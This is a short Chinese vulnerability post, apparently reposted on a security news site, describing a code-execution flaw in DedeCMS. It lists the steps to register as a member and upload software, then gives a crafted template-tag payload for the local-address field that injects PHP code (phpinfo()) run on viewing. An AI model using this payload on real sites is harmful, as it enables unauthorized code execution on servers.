【漏洞】DeDecms的一个鸡肋代码执行漏洞

admin 2021年4月3日19:01:19评论44 views字数 416阅读1分23秒阅读模式

    因为鸡肋,所以发出来。说下利用方法:

    注册会员,上传软件;本地地址中填入a{/dede:link}{dede:toby57 name="']=0;phpinfo();//"}x{/dede:toby57},发表后查看或修改即可执行。

    生成的解析文件内容如下:

    成功效果:

    这漏洞鸡肋之处在于经历上次的0day冲击后,很多站点已经关闭了会员功能或者直接删除了member目录,并且没有多少站会有软件栏目的,嗯,所以搞搞下载站之类的差不多了。

文章来源于lcx.cc:【漏洞】DeDecms的一个鸡肋代码执行漏洞

相关推荐: 【文章】9.5 自同步序列密码 - 密钥流发生器

9.5 自同步序列密码     自同步序列密码就是密钥流的每一位是前面固定数量密文位的函数[1378]。军方称为密文自动密钥(CTAK)。其基本思想是在1946年成形的[667]。     图9.8描述了其工作原理。其中,内部状态是前面n比特密文的函数。该算法…

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年4月3日19:01:19
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【漏洞】DeDecms的一个鸡肋代码执行漏洞http://cn-sec.com/archives/319626.html

发表评论

匿名网友 填写信息